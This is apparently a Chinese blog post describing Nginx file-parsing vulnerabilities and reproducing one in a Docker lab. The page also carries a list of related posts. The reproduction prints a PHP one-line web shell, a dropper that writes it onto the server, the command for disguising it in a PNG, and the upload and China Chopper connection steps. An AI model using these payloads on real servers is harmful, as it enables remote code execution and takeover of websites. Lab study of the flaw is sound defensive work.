Nginx文件解析漏洞的原理与复现

已于 2022-03-30 20:21:55 修改
阅读量7.5k 收藏 3
点赞数 3
分类专栏: 中间件漏洞 文章标签: web安全 nginx 安全
于 2022-03-30 01:04:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LJH1999ZN/article/details/123835818
版权

一、Nginx的简介

Nginx (engine x) 是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力在同类型的网页服务器中表现较好,中国大陆使用nginx网站用户有:百度、京东、新浪、网易、腾讯、淘宝等

二、Nginx漏洞的原理

1,Nginx越界读取缓存漏洞(CVE-2017-7529) 可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。

2,Nginx 文件名逻辑漏洞(CVE-2013-4547) 主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。

3,Nginx解析漏洞复现 第3和第2都是文件解析漏洞,只是利用的方式不同,第2利用方式为:1.png.php。而第3利用方式为:1.png/.php。这样,1.png文件就会当成php文件进行解析。从而造成代码执行等。

三、Nginx漏洞的复现

11.php内容:   <?php eval(\$_POST['chopper']);?>

1.PHP内容: <?php fwrite(fopen("/var/www/html/uploadfiles/nginx1.php","w"),"<?php eval(\$_POST['chopper']);?>")?>

1.制作图片木马,使用命令: copy nginx.png/b+1.php nginx1.png     获得图片木马nginx2.png

进入docker容器,开启响应的进程,然后上传图片码

 进行抓包修改文件名

 然后进行访问http://192.168.44.145:8080/uploadfiles/nginx.png .php并且抓包,

 

然后使用菜刀连接:http://192.168.44.145:8080/uploadfiles/nginx1.php

一句话木马
关注
专栏目录
Nginx 解析漏洞复现
天天学安全专属博客
07-18 1155
Nginx 解析漏洞复现
12-4 Nginx漏洞复现与分析
weixin_43263566的博客
11-29 1638
CGl: CGl是一种协议,用于定义Nginx或其他Web Server传递的数据格式。CGl是一个独立的程序,与Web Server无关,可以用任何语言编写CGl程序,比如C、Perl、Python等。Fastcgi: Fastcgi:是一种协议,前身是CGI,可以简单理解为是优化版的CGI,具有更高的稳定性和性能。PHP-CGI: 只是一个PHP的解释器,本身只能解析请求并返回结果,不会做进程管理。
Nginx 解析漏洞复现及利用
Tauil的博客
07-20 7943
Nginx解析漏洞解析漏洞是PHPCGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认开启,当URL中有不存在的文件,PHP就会向前递归解析在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg解析为php文件。来上传我们的文件,很显然,不给上传,东西写进去文件被破坏了,被检验出不是正常的jpg不能上传了,可能有些朋友就成功了,因为第一次的时候我是可以的,现在应该是写的内容太多了,出了问题。phpeval($_POST["cmd"]);...
nginx文件解析漏洞
大方子
07-27 4098
文件解析漏洞 目标环境 win2003(x64) PHPstudy2016 nginx 复现过程 先写一个上传的网页 upload.html <!DOCTYPE html> <html> <head> <title>File Upload</title> </head&g...
nginx常见漏洞解析_nginx漏洞
最新发布
2401_87298532的博客
09-22 1771
0×1HTTP返回包头:就是httpresponsHTTP返回包体:就是请求的具体文件,例如出来个网页资源,网页内嵌套的内容等等。content-range是什么?range是什么?存在于HTTP请求头中,表示请求目标资源的部分内容,例如请求一个图片的前半部分,单位是byte,原则上从0开始,但今天介绍的是可以设置为负数。range的典型应用场景例如:断点续传、分批请求资源。content-range的表达方式:Range:bytes=0-1024 表示访问第0到第1024字节;
文件解析漏洞复现
m0_59151303的博客
07-30 995
这个解析漏洞其实是PHP CGI的漏洞,在PHP的配置文件中有一个关键的选项cgi.fix_pathinfo默认是开启的,当URL中有不存在的文件,PHP就会向前递归解析。在一个文件/xx.jpg后面加上/.php会将/xx.jpg/xx.php 解析为 php 文件。在I1S7.0和I1S7.5版本下也存在解析漏洞,在默认Fast-CGI开启状况下,在一个文件路径/xx.jpg后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。上传一个后缀名是.php.jpg的文件里面写入
nginx常见漏洞解析
热门推荐
qtttgeq的博客
04-06 1万+
0×1HTTP返回包头:就是httpresponsHTTP返回包体:就是请求的具体文件,例如出来个网页资源,网页内嵌套的内容等等。content-range是什么?range是什么?存在于HTTP请求头中,表示请求目标资源的部分内容,例如请求一个图片的前半部分,单位是byte,原则上从0开始,但今天介绍的是可以设置为负数。range的典型应用场景例如:断点续传、分批请求资源。content-range的表达方式:Range:bytes=0-1024 表示访问第0到第1024字节;
Nginx-文件解析漏洞
weixin_45095113的博客
07-30 3298
关于Nginx服务器的一些漏洞-文件解析漏洞
下列哪个是nginx解析漏洞解析为php的文件_phpStudy nginx解析漏洞预警通报
weixin_39613951的博客
11-23 616
大网安协【2020-59】近日,大连网络安全信息通报机制合作单位新华三集团(H3C)提醒,一个PHP调试环境的程序集成包phpStudy,Windows 版本存在nginx解析漏洞。1.漏洞综述1.1漏洞背景phpStudy是一个PHP调试环境的程序集成包,兼容Windows和Linux系统,支持Web端管理,可以一键创建网站、FTP、数据库等,实现了文件管理,PHP多版本共存及切...
利用 Nginx 畸形解析漏洞 getshell
weixin_45253622的博客
12-09 3699
Nginx Nginx 是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力确实在同类型的网页服务器中表现较好。 漏洞描述: 对于任意文件名,在后面添加/xxx.php(xxx为任意字符)后,即可将文件作为php解析。 例:info.jpg后面加上/xxx.php,会将info.jpg 以php解析漏洞原理: 查看 nginx 配置文件: cd /home/ch1/Desktop
Nginx解析漏洞测试
09-19
Nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理,也可以非常好的支持PHP的运行。默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析,这将导致严重的安全问题,使得恶意的攻击者可能攻陷支持php的nginx服务器。
Nginx文件解析漏洞
xdjxi的博客
02-23 1797
1 首先拉取一个基础镜像 docker pull ubuntu:14.04.5 2.启动一个容器 使用docker run -d -it -p本机端口:80 ubuntu:14.04.5启动镜像 3.进入容器 使用docker exec -it [容器ID]/bin/bash进入容器 4 .更换apt源 然后使用以下语句安装相关环境: apt-get update # 更新源 apt-get install vim # 安装vim apt-get install nginx #..
Nginx文件解析漏洞CVE-2013-4547)
qq_54658370的博客
07-28 972
一丶漏洞原理 漏洞出现的主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的影响。 Nginx匹配到.php结尾请求,会发生给fastcgi解析 在关闭pathinfo情况下只有.php后缀文件才会被发生给fastcgi解析。 在CVE-2013-4547的情况下,请求1.gif[0x20][0x00].php,这个URI可以匹配上正则\.php$,可以进入这个Location块;但进入后...
nginx文件解析漏洞测试
qq_52712762的博客
05-26 1110
环境条件:ubuntu14,已安装docker,docker pull ubuntu:14.04.5。
Nginx 解析漏洞分析
灰太的表格的博客
06-07 494
Nginx 解析漏洞 漏洞原因:该漏洞Nginx、php版本无关,属于用户配置不当造成的解析漏洞。 如果我们上传了一个1.jpg文件,但是访问的是/1.jpg/.php那么fastcgi在处理".php"文件时发现文件并不存在,这时php.ini配置文件中cgi.fix_pathinfo=1 发挥作用,采用上层路径。为此这里交由fastcgi处理的文件就变为了test.png。 漏洞形成要求: 1.php.ini配置文件中cgi.fix_pathinfo=1 2. 3.php-fpm.conf中的secu
Nginx解析漏洞复现
wyzhxhn的博客
11-18 2061
Nginx解析漏洞
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一句话木马

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值